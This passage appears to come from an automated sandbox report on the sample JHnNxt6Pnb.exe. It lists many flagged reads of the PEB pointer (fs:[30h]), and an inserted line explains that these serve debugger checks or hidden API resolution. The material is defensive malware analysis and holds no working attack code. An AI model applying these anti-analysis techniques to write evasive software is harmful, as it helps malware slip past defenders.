            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A605A7 mov eax, dword ptr fs:[00000030h]4_2_01A605A7
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A605A7 mov eax, dword ptr fs:[00000030h]4_2_01A605A7
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A605A7 mov eax, dword ptr fs:[00000030h]4_2_01A605A7
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A045B1 mov eax, dword ptr fs:[00000030h]4_2_01A045B1
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A045B1 mov eax, dword ptr fs:[00000030h]4_2_01A045B1
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E2582 mov eax, dword ptr fs:[00000030h]4_2_019E2582
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E2582 mov ecx, dword ptr fs:[00000030h]4_2_019E2582
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A14588 mov eax, dword ptr fs:[00000030h]4_2_01A14588
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1E59C mov eax, dword ptr fs:[00000030h]4_2_01A1E59C
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A0E5E7 mov eax, dword ptr fs:[00000030h]4_2_01A0E5E7
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A0E5E7 mov eax, dword ptr fs:[00000030h]4_2_01A0E5E7
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A0E5E7 mov eax, dword ptr fs:[00000030h]4_2_01A0E5E7
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A0E5E7 mov eax, dword ptr fs:[00000030h]4_2_01A0E5E7
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A0E5E7 mov eax, dword ptr fs:[00000030h]4_2_01A0E5E7
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A0E5E7 mov eax, dword ptr fs:[00000030h]4_2_01A0E5E7
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A0E5E7 mov eax, dword ptr fs:[00000030h]4_2_01A0E5E7
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A0E5E7 mov eax, dword ptr fs:[00000030h]4_2_01A0E5E7
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1C5ED mov eax, dword ptr fs:[00000030h]4_2_01A1C5ED
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1C5ED mov eax, dword ptr fs:[00000030h]4_2_01A1C5ED
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E65D0 mov eax, dword ptr fs:[00000030h]4_2_019E65D0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1E5CF mov eax, dword ptr fs:[00000030h]4_2_01A1E5CF
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1E5CF mov eax, dword ptr fs:[00000030h]4_2_01A1E5CF
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1A5D0 mov eax, dword ptr fs:[00000030h]4_2_01A1A5D0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1A5D0 mov eax, dword ptr fs:[00000030h]4_2_01A1A5D0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E25E0 mov eax, dword ptr fs:[00000030h]4_2_019E25E0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A0E53E mov eax, dword ptr fs:[00000030h]4_2_01A0E53E
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A0E53E mov eax, dword ptr fs:[00000030h]4_2_01A0E53E
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A0E53E mov eax, dword ptr fs:[00000030h]4_2_01A0E53E
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A0E53E mov eax, dword ptr fs:[00000030h]4_2_01A0E53E
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A0E53E mov eax, dword ptr fs:[00000030h]4_2_01A0E53E
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A76500 mov eax, dword ptr fs:[00000030h]4_2_01A76500
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F0535 mov eax, dword ptr fs:[00000030h]4_2_019F0535
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F0535 mov eax, dword ptr fs:[00000030h]4_2_019F0535
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F0535 mov eax, dword ptr fs:[00000030h]4_2_019F0535
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F0535 mov eax, dword ptr fs:[00000030h]4_2_019F0535
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F0535 mov eax, dword ptr fs:[00000030h]4_2_019F0535
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F0535 mov eax, dword ptr fs:[00000030h]4_2_019F0535
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AB4500 mov eax, dword ptr fs:[00000030h]4_2_01AB4500
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AB4500 mov eax, dword ptr fs:[00000030h]4_2_01AB4500
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AB4500 mov eax, dword ptr fs:[00000030h]4_2_01AB4500
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AB4500 mov eax, dword ptr fs:[00000030h]4_2_01AB4500
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AB4500 mov eax, dword ptr fs:[00000030h]4_2_01AB4500
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AB4500 mov eax, dword ptr fs:[00000030h]4_2_01AB4500
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AB4500 mov eax, dword ptr fs:[00000030h]4_2_01AB4500
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1656A mov eax, dword ptr fs:[00000030h]4_2_01A1656A
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1656A mov eax, dword ptr fs:[00000030h]4_2_01A1656A
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1656A mov eax, dword ptr fs:[00000030h]4_2_01A1656A
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E8550 mov eax, dword ptr fs:[00000030h]4_2_019E8550
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E8550 mov eax, dword ptr fs:[00000030h]4_2_019E8550
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A144B0 mov ecx, dword ptr fs:[00000030h]4_2_01A144B0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A6A4B0 mov eax, dword ptr fs:[00000030h]4_2_01A6A4B0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A9A49A mov eax, dword ptr fs:[00000030h]4_2_01A9A49A
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E64AB mov eax, dword ptr fs:[00000030h]4_2_019E64AB
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E04E5 mov ecx, dword ptr fs:[00000030h]4_2_019E04E5
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A66420 mov eax, dword ptr fs:[00000030h]4_2_01A66420
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A66420 mov eax, dword ptr fs:[00000030h]4_2_01A66420
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A66420 mov eax, dword ptr fs:[00000030h]4_2_01A66420
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A66420 mov eax, dword ptr fs:[00000030h]4_2_01A66420
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A66420 mov eax, dword ptr fs:[00000030h]4_2_01A66420
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A66420 mov eax, dword ptr fs:[00000030h]4_2_01A66420
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A66420 mov eax, dword ptr fs:[00000030h]4_2_01A66420
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1A430 mov eax, dword ptr fs:[00000030h]4_2_01A1A430
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A18402 mov eax, dword ptr fs:[00000030h]4_2_01A18402
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A18402 mov eax, dword ptr fs:[00000030h]4_2_01A18402
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A18402 mov eax, dword ptr fs:[00000030h]4_2_01A18402
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019DC427 mov eax, dword ptr fs:[00000030h]4_2_019DC427
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019DE420 mov eax, dword ptr fs:[00000030h]4_2_019DE420
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019DE420 mov eax, dword ptr fs:[00000030h]4_2_019DE420
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019DE420 mov eax, dword ptr fs:[00000030h]4_2_019DE420
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019D645D mov eax, dword ptr fs:[00000030h]4_2_019D645D
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A6C460 mov ecx, dword ptr fs:[00000030h]4_2_01A6C460
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A0A470 mov eax, dword ptr fs:[00000030h]4_2_01A0A470
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A0A470 mov eax, dword ptr fs:[00000030h]4_2_01A0A470
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A0A470 mov eax, dword ptr fs:[00000030h]4_2_01A0A470
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1E443 mov eax, dword ptr fs:[00000030h]4_2_01A1E443
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1E443 mov eax, dword ptr fs:[00000030h]4_2_01A1E443
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1E443 mov eax, dword ptr fs:[00000030h]4_2_01A1E443
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1E443 mov eax, dword ptr fs:[00000030h]4_2_01A1E443
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1E443 mov eax, dword ptr fs:[00000030h]4_2_01A1E443
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1E443 mov eax, dword ptr fs:[00000030h]4_2_01A1E443
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1E443 mov eax, dword ptr fs:[00000030h]4_2_01A1E443
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1E443 mov eax, dword ptr fs:[00000030h]4_2_01A1E443
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A0245A mov eax, dword ptr fs:[00000030h]4_2_01A0245A
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A9A456 mov eax, dword ptr fs:[00000030h]4_2_01A9A456
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A947A0 mov eax, dword ptr fs:[00000030h]4_2_01A947A0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A8678E mov eax, dword ptr fs:[00000030h]4_2_01A8678E
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E07AF mov eax, dword ptr fs:[00000030h]4_2_019E07AF
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A6E7E1 mov eax, dword ptr fs:[00000030h]4_2_01A6E7E1
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A027ED mov eax, dword ptr fs:[00000030h]4_2_01A027ED
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A027ED mov eax, dword ptr fs:[00000030h]4_2_01A027ED
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A027ED mov eax, dword ptr fs:[00000030h]4_2_01A027ED
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019EC7C0 mov eax, dword ptr fs:[00000030h]4_2_019EC7C0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E47FB mov eax, dword ptr fs:[00000030h]4_2_019E47FB
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E47FB mov eax, dword ptr fs:[00000030h]4_2_019E47FB
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A607C3 mov eax, dword ptr fs:[00000030h]4_2_01A607C3
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1C720 mov eax, dword ptr fs:[00000030h]4_2_01A1C720
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1C720 mov eax, dword ptr fs:[00000030h]4_2_01A1C720
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E0710 mov eax, dword ptr fs:[00000030h]4_2_019E0710
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A5C730 mov eax, dword ptr fs:[00000030h]4_2_01A5C730
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1273C mov eax, dword ptr fs:[00000030h]4_2_01A1273C
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1273C mov ecx, dword ptr fs:[00000030h]4_2_01A1273C
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1273C mov eax, dword ptr fs:[00000030h]4_2_01A1273C
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1C700 mov eax, dword ptr fs:[00000030h]4_2_01A1C700
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A10710 mov eax, dword ptr fs:[00000030h]4_2_01A10710
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E0750 mov eax, dword ptr fs:[00000030h]4_2_019E0750
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1674D mov esi, dword ptr fs:[00000030h]4_2_01A1674D
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1674D mov eax, dword ptr fs:[00000030h]4_2_01A1674D
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1674D mov eax, dword ptr fs:[00000030h]4_2_01A1674D
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E8770 mov eax, dword ptr fs:[00000030h]4_2_019E8770
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F0770 mov eax, dword ptr fs:[00000030h]4_2_019F0770
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F0770 mov eax, dword ptr fs:[00000030h]4_2_019F0770
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F0770 mov eax, dword ptr fs:[00000030h]4_2_019F0770
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F0770 mov eax, dword ptr fs:[00000030h]4_2_019F0770
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F0770 mov eax, dword ptr fs:[00000030h]4_2_019F0770
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F0770 mov eax, dword ptr fs:[00000030h]4_2_019F0770
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F0770 mov eax, dword ptr fs:[00000030h]4_2_019F0770
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F0770 mov eax, dword ptr fs:[00000030h]4_2_019F0770
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F0770 mov eax, dword ptr fs:[00000030h]4_2_019F0770
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F0770 mov eax, dword ptr fs:[00000030h]4_2_019F0770
            The records below are reads of the PEB pointer: on 32-bit Windows fs:[30h] is the PEB field of the TEB, and code loads it either to inspect PEB.BeingDebugged / PEB.NtGlobalFlag (debugger checks) or to walk PEB.Ldr and resolve APIs without an import table. Consecutive identical records are collapsed, with the count in parentheses.
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_019F0770 mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A22750 mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A64755 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A6E75D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A1C6A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_019E4690 mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A166B0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A5E6F2 mov eax, dword ptr fs:[00000030h] (x4)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A606F1 mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A1A6C7 mov ebx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A1A6C7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A16620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A18620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_019F260B mov eax, dword ptr fs:[00000030h] (x7)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A5E609 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_019E262C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_019FE627 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A22619 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A1A660 mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01AA866E mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A12674 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_019FC640 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A689B3 mov esi, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A689B3 mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_019E09AD mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_019F29A0 mov eax, dword ptr fs:[00000030h] (x13)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A6E9E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_019EA9D0 mov eax, dword ptr fs:[00000030h] (x6)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A129F9 mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A769C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A149D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01AAA9D3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_019D8918 mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A6892A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A7892B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A5E908 mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A6C912 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A06962 mov eax, dword ptr fs:[00000030h] (x3)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A2096E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A2096E mov edx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A2096E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A84978 mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A6C97C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A60946 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_019E0887 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A6C89D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01AAA8E4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A1C8F9 mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A0E8C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A1A830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A8483A mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A02835 mov eax, dword ptr fs:[00000030h] (x3)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A02835 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A02835 mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A6C810 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_019E4859 mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A6E872 mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A76870 mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_019F2840 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A10854 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A94BB0 mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_019F0BBE mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_019E0BCD mov eax, dword ptr fs:[00000030h] (x3)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A6CBF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A0EBFC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A00BCB mov eax, dword ptr fs:[00000030h] (x3)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_019E8BF0 mov eax, dword ptr fs:[00000030h] (x3)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A8EBD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A0EB20 mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01AA8B28 mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A5EB1D mov eax, dword ptr fs:[00000030h] (x9)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A94B4B mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_019DCB7E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A76B40 mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01AAAB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A88B42 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A8EB50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A36AA4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_019EEA80 mov eax, dword ptr fs:[00000030h] (x9)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01AB4A80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A18A90 mov edx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_019E8AA0 mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_019E0AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A1AAEE mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A36ACC mov eax, dword ptr fs:[00000030h] (x3)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe | Code function: 4_2_01A14AD0 mov eax, dword ptr fs:[00000030h] (x2)
